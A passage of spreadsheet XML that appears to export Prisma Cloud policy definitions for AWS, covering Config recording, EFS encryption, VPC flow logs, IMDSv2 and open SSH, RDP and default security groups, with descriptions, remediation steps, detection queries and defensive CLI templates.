        </is>
      </c>
      <c r="W24" t="inlineStr">
        <is>
          <t>AWS Config is a web service that performs configuration management of supported AWS resources within your account and delivers log files to you. AWS config uses configuration recorder to detect changes in your resource configurations and capture these changes as configuration items. It continuously monitors and records your AWS resource configurations and allows you to automate the evaluation of recorded configurations against desired configurations. This policy generates alerts when AWS Config recorder is not enabled.</t>
        </is>
      </c>
      <c r="X24" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Management Console
2. Select the specific region from the top down, for which the alert is generated
3. Navigate to service 'Config' from the 'Services' dropdown.
If AWS Config set up exists,
a. Go to Settings
b. Click on 'Turn On' button under 'Recording is Off' section,
c. provide required information for bucket and role with proper permission
If AWS Config set up doesn't exist
a. Click on 'Get Started'
b. For Step 1, Tick the check box for 'Record all resources supported in this region' under section 'Resource types to record'
c. Under section 'Amazon S3 bucket', select bucket with permission to Config services
d. Under section 'AWS Config role', select a role with permission to Config services
e. Click on 'Next'
f. For Step 2, Select required rule and click on 'Next' otherwise click on 'Skip'
g. For Step 3, Review the created 'Settings' and click on 'Confirm' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-config-recorder-is-enabled-to-record-all-supported-resources
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-config-recorder-is-enabled-to-record-all-supported-resources</t>
        </is>
      </c>
      <c r="Y24" t="inlineStr"/>
      <c r="Z24" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-configservice-describe-configuration-recorders' AND json.rule = 'status.recording is true and status.lastStatus equals SUCCESS and recordingGroup.allSupported is true' as X; count(X) less than 1
{"category":"General","resourceTypes":["aws_config_configuration_recorder", "aws_config_configuration_recorder_status"]}</t>
        </is>
      </c>
      <c r="AA24" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB24" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC24" t="inlineStr">
        <is>
          <t>PC-AWS-CFG-159-CKV2_AWS_45</t>
        </is>
      </c>
      <c r="AD24" t="b">
        <v>1</v>
      </c>
      <c r="AE24" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF24" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>ca5c571e-6930-44af-a47b-ebde3ac20ca5</t>
        </is>
      </c>
      <c r="AI24" t="inlineStr">
        <is>
          <t>58d5da42-26f2-466b-8642-c2301d1bf510</t>
        </is>
      </c>
      <c r="AJ24" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK24" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B25" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C25" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D25" t="n">
        <v>0</v>
      </c>
      <c r="E25" t="n">
        <v>0</v>
      </c>
      <c r="F25" t="n">
        <v>6</v>
      </c>
      <c r="G25" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J25" t="inlineStr">
        <is>
          <t>aws-describe</t>
        </is>
      </c>
      <c r="K25" t="inlineStr">
        <is>
          <t>AWS Elastic File System (EFS) with encryption for data at rest is disabled</t>
        </is>
      </c>
      <c r="L25" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M25" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N25" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O25" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P25" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q25" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R25" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S25" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T25" t="b">
        <v>0</v>
      </c>
      <c r="U25" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V25" t="inlineStr">
        <is>
          <t>aws-describe-mount-targets</t>
        </is>
      </c>
      <c r="W25" t="inlineStr">
        <is>
          <t>This policy identifies Elastic File Systems (EFSs) for which encryption for data at rest is disabled. It is highly recommended to implement at-rest encryption in order to prevent unauthorized users from reading sensitive data saved to EFSs.</t>
        </is>
      </c>
      <c r="X25" t="inlineStr">
        <is>
          <t>AWS EFS Encryption of data at rest can only be enabled during file system creation. So to resolve this alert, create a new EFS with encryption enabled, then migrate all required file data from the reported EFS to this newly created EFS and delete reported EFS.
To create a new EFS with encryption enabled, perform the following:
1. Sign in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Navigate to the EFS dashboard
4. Click on 'File systems' (Left Panel)
5. Click on the 'Create file system' button
6. On the 'Create file system' pop-up window, 
7. Click on 'Customize' button to replicate the configurations of alerted file system as required
8. Ensure 'Enable encryption of data at rest' is selected
9. On the 'Review and create' step, Review all your setting and click on the 'Create' button
To delete reported EFS which does not has encryption, perform the following:
1. Sign in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Navigate to the EFS dashboard
4. Click on 'File systems' (Left Panel)
5. Select the reported file system
6. Click on 'Delete' button
7. In the 'Delete file system' popup box, To confirm the deletion enter the file system's ID and Click on 'Confirm' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-17
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-17</t>
        </is>
      </c>
      <c r="Y25" t="inlineStr"/>
      <c r="Z25" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-describe-mount-targets' AND json.rule = 'fileSystemDescription.encrypted is false'
{"category":"General","resourceTypes":["aws_efs_file_system"]}</t>
        </is>
      </c>
      <c r="AA25" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB25" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC25" t="inlineStr">
        <is>
          <t>PC-AWS-EFS-243-CKV_AWS_42</t>
        </is>
      </c>
      <c r="AD25" t="b">
        <v>1</v>
      </c>
      <c r="AE25" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF25" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>a7451ade-75eb-4e3e-b996-c2b0d5fdd329</t>
        </is>
      </c>
      <c r="AI25" t="inlineStr">
        <is>
          <t>5eb50d57-7e94-4204-a4e7-3471b3f7e82e</t>
        </is>
      </c>
      <c r="AJ25" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK25" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B26" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C26" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D26" t="inlineStr"/>
      <c r="E26" t="inlineStr"/>
      <c r="F26" t="inlineStr"/>
      <c r="G26" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J26" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K26" t="inlineStr">
        <is>
          <t>AWS VPC Flow Logs not enabled</t>
        </is>
      </c>
      <c r="L26" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M26" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N26" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O26" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P26" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q26" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R26" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S26" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T26" t="b">
        <v>0</v>
      </c>
      <c r="U26" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V26" t="inlineStr">
        <is>
          <t>aws-ec2-describe-flow-logs</t>
        </is>
      </c>
      <c r="W26" t="inlineStr">
        <is>
          <t>This policy identifies VPCs which have flow logs disabled. VPC Flow logs capture information about IP traffic going to and from network interfaces in your VPC. Flow logs are used as a security tool to monitor the traffic that is reaching your instances. Without the flow logs turned on, it is not possible to get any visibility into network traffic.</t>
        </is>
      </c>
      <c r="X26" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to VPC Dashboard
4. Click on 'Your VPCs' and Choose the reported VPC
5. Click on the 'Flow logs' tab and follow the instructions as in link below to enable Flow Logs for the VPC:
https://aws.amazon.com/blogs/aws/vpc-flow-logs-log-and-view-network-traffic-flows/ 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-9-enable-vpc-flow-logging
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-9-enable-vpc-flow-logging</t>
        </is>
      </c>
      <c r="Y26" t="inlineStr"/>
      <c r="Z26" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-flow-logs' as X; config from cloud.resource where api.name = 'aws-ec2-describe-vpcs' AND json.rule = shared is false as Y; filter 'not($.X.resourceId equals $.Y.vpcId)' ; show Y;
{"category":"Logging","resourceTypes":["aws_vpc"]}</t>
        </is>
      </c>
      <c r="AA26" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB26" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC26" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-25-CKV2_AWS_11</t>
        </is>
      </c>
      <c r="AD26" t="b">
        <v>1</v>
      </c>
      <c r="AE26" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF26" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>49f4760d-c951-40e4-bfe1-08acaa17672a</t>
        </is>
      </c>
      <c r="AI26" t="inlineStr">
        <is>
          <t>58dbed8c-b9d5-4059-8891-ab0de8283cdd</t>
        </is>
      </c>
      <c r="AJ26" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK26" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B27" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C27" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D27" t="n">
        <v>7340</v>
      </c>
      <c r="E27" t="n">
        <v>20</v>
      </c>
      <c r="F27" t="n">
        <v>91</v>
      </c>
      <c r="G27" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J27" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K27" t="inlineStr">
        <is>
          <t>AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)</t>
        </is>
      </c>
      <c r="L27" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M27" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N27" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O27" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P27" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q27" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R27" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S27" t="inlineStr">
        <is>
          <t>Attack Path Rule,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T27" t="b">
        <v>1</v>
      </c>
      <c r="U27" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V27" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W27" t="inlineStr">
        <is>
          <t>This policy identifies AWS instances that are not configured with Instance Metadata Service v2 (IMDSv2). With IMDSv2, every request is now protected by session authentication. IMDSv2 protects against misconfigured-open website application firewalls, misconfigured-open reverse proxies, unpatched SSRF vulnerabilities, and misconfigured-open layer-3 firewalls and network address translation. It is recommended to use only IMDSv2 for all your EC2 instances.
For more details:https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html</t>
        </is>
      </c>
      <c r="X27" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Refer 'Configure instance metadata options for existing instances' section from follwoing URL
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html
NOTE: Make a precaution before you enforce the use of IMDSv2, as applications or agents that use IMDSv1 for instance metadata access will break. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-31
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-31</t>
        </is>
      </c>
      <c r="Y27" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'ec2:ModifyInstanceMetadataOptions' permission. Successful execution will enable Instance Metadata Service v2 (IMDSv2) on your EC2 Instance.",
'impact': 'Enables Metadata Service v2 (IMDSv2)',
'cliScriptTemplate': 'aws ec2 modify-instance-metadata-options --instance-id $resourceId --region $region --http-tokens required --http-endpoint enabled'</t>
        </is>
      </c>
      <c r="Z27" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule = state contains running and metadataOptions.httpEndpoint equals enabled and metadataOptions.httpTokens does not contain required
{"category":"General","resourceTypes":["aws_instance","aws_launch_template"]}</t>
        </is>
      </c>
      <c r="AA27" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB27" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC27" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-698-CKV_AWS_79</t>
        </is>
      </c>
      <c r="AD27" t="b">
        <v>1</v>
      </c>
      <c r="AE27" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF27" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>32f75d19-c34d-4ec5-aa8c-675959db3aad</t>
        </is>
      </c>
      <c r="AI27" t="inlineStr">
        <is>
          <t>81c165ce-f66e-441a-8ea0-56a107175ccc</t>
        </is>
      </c>
      <c r="AJ27" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK27" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B28" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C28" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D28" t="inlineStr"/>
      <c r="E28" t="inlineStr"/>
      <c r="F28" t="inlineStr"/>
      <c r="G28" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J28" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K28" t="inlineStr">
        <is>
          <t>Copy of AWS Security Group allows all traffic on SSH port (22)</t>
        </is>
      </c>
      <c r="L28" t="inlineStr"/>
      <c r="M28" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N28" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O28" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P28" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q28" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R28" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S28" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure network configuration,Custom</t>
        </is>
      </c>
      <c r="T28" t="b">
        <v>0</v>
      </c>
      <c r="U28" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V28" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W28" t="inlineStr">
        <is>
          <t>This policy identifies Security groups that allow all traffic on SSH port 22. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. Review your list of security group rules to ensure that your resources are not exposed. As a best practice, restrict SSH solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X28" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the Security Group reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the AWS Console
2. Navigate to the 'VPC' service
3. Select the 'Security Group' reported in the alert
4. Click on the 'Inbound Rule'
5. Remove the rule which has 'Source' value as 0.0.0.0/0 or ::/0 and 'Port Range' value as 22 (or range containing 22)</t>
        </is>
      </c>
      <c r="Y28" t="inlineStr"/>
      <c r="Z28" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-ec2-describe-security-groups' AND json.rule = isShared is false and (ipPermissions[?any((ipRanges[*] contains 0.0.0.0/0 or ipv6Ranges[*].cidrIpv6 contains ::/0) and ((toPort == 22 or fromPort == 22) or (toPort &gt; 22 and fromPort &lt; 22)))] exists)</t>
        </is>
      </c>
      <c r="AA28" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB28" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC28" t="inlineStr"/>
      <c r="AD28" t="b">
        <v>0</v>
      </c>
      <c r="AE28" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF28" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>397d3a94-c447-4788-bb87-7a37836abbb4</t>
        </is>
      </c>
      <c r="AI28" t="inlineStr">
        <is>
          <t>62c42bbc-1764-408f-814c-68d2b392af1f</t>
        </is>
      </c>
      <c r="AJ28" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK28" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B29" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C29" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D29" t="inlineStr"/>
      <c r="E29" t="inlineStr"/>
      <c r="F29" t="inlineStr"/>
      <c r="G29" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J29" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K29" t="inlineStr">
        <is>
          <t>AWS Default Security Group does not restrict all traffic</t>
        </is>
      </c>
      <c r="L29" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M29" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N29" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O29" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P29" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q29" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R29" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S29" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T29" t="b">
        <v>0</v>
      </c>
      <c r="U29" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V29" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W29" t="inlineStr">
        <is>
          <t>This policy identifies the default security groups which does not restrict inbound and outbound traffic. A VPC comes with a default security group whose initial configuration denies all inbound traffic and allow all outbound traffic. If you do not specify a security group when you launch an instance, the instance is automatically assigned to this default security group. As a result, the instance may accidentally send outbound traffic. It is recommended that to remove any inbound and outbound rules in the default security group and not to attach the default security group to any resources.</t>
        </is>
      </c>
      <c r="X29" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact on your applications/services.
For Resources associated with the alerted security group:
1. Identify AWS resources that exist within the default security group
2. Create a set of least privilege security groups for those resources
3. Place the resources in those security groups
4. Remove the associated resources from the default security group
For alerted Security Groups:
1. Log in to the AWS console
2. In the console, select the specific region from the 'Region' drop-down on the top right corner, for which the alert is generated
3. Navigate to the 'VPC' service
4. For each region, Click on 'Security Groups' specific to the alert
5. On section 'Inbound rules', Click on 'Edit Inbound Rules' and remove the existing rule, click on 'Save'
6. On section 'Outbound rules', Click on 'Edit Outbound Rules' and remove the existing rule, click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-4
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-4</t>
        </is>
      </c>
      <c r="Y29" t="inlineStr"/>
      <c r="Z29" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-security-groups' AND json.rule = '((groupName == default) and (ipPermissions[*] is not empty or ipPermissionsEgress[*] is not empty))'
{"category":"Networking","resourceTypes":["aws_default_security_group","aws_vpc"]}</t>
        </is>
      </c>
      <c r="AA29" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB29" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC29" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-22-CKV2_AWS_12</t>
        </is>
      </c>
      <c r="AD29" t="b">
        <v>1</v>
      </c>
      <c r="AE29" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF29" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>2378dbf4-b104-4bda-9b05-7417affbba3f</t>
        </is>
      </c>
      <c r="AI29" t="inlineStr">
        <is>
          <t>8824de78-7e99-4ef2-9c3d-8110e12c7df7</t>
        </is>
      </c>
      <c r="AJ29" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK29" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B30" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C30" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D30" t="n">
        <v>30</v>
      </c>
      <c r="E30" t="n">
        <v>10</v>
      </c>
      <c r="F30" t="n">
        <v>34</v>
      </c>
      <c r="G30" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J30" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K30" t="inlineStr">
        <is>
          <t>AWS Security Group allows all traffic on RDP port (3389)</t>
        </is>
      </c>
      <c r="L30" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M30" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N30" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O30" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P30" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q30" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R30" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S30" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T30" t="b">
        <v>1</v>
      </c>
      <c r="U30" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V30" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W30" t="inlineStr">
        <is>
          <t>This policy identifies Security groups that allow all traffic on RDP port 3389. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. Review your list of security group rules to ensure that your resources are not exposed. As a best practice, restrict RDP solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X30" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the Security Group reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the AWS Console
2. Navigate to the 'VPC' service
3. Select the 'Security Group' reported in the alert
4. Click on the 'Inbound Rule'
5. Remove the rule which has 'Source' value as 0.0.0.0/0 or ::/0 and 'Port Range' value as 3389 (or range containing 3389) 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-2</t>
        </is>
      </c>
      <c r="Y30" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'ec2:RevokeSecurityGroupIngress' permission. Successful execution will update the security group to revoke the ingress rule records with port 3389 open to all traffic either on IPv4 or on IPv6 protocol.",
'impact': 'Deletes the reported Security Group to restrict RDP traffic from all traffic',
'cliScriptTemplate': 'aws --region $region ec2 revoke-security-group-ingress --group-id $resourceId --ip-permissions \'["IpProtocol": "$protocol",
"FromPort": $fromPort,
"ToPort": $toPort,
"Ip$ipV4/6Ranges":["CidrIp$ipV4/6":"$cidr"]]\''</t>
        </is>
      </c>
      <c r="Z30" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-ec2-describe-security-groups' AND json.rule = isShared is false and (ipPermissions[?any((ipRanges[*] contains 0.0.0.0/0 or ipv6Ranges[*].cidrIpv6 contains ::/0) and ((toPort == 3389 or fromPort == 3389) or (toPort &gt; 3389 and fromPort &lt; 3389)))] exists)
{"category":"Networking","resourceTypes":["aws_security_group","aws_security_group_rule"]}</t>
        </is>
      </c>
      <c r="AA30" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB30" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC30" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-24-CKV_AWS_25</t>
        </is>
      </c>
      <c r="AD30" t="b">
        <v>1</v>
      </c>
      <c r="AE30" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF30" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>b82f90ce-ed8b-4b49-970c-2268b0a6c2e5</t>
        </is>
      </c>
      <c r="AI30" t="inlineStr">
        <is>
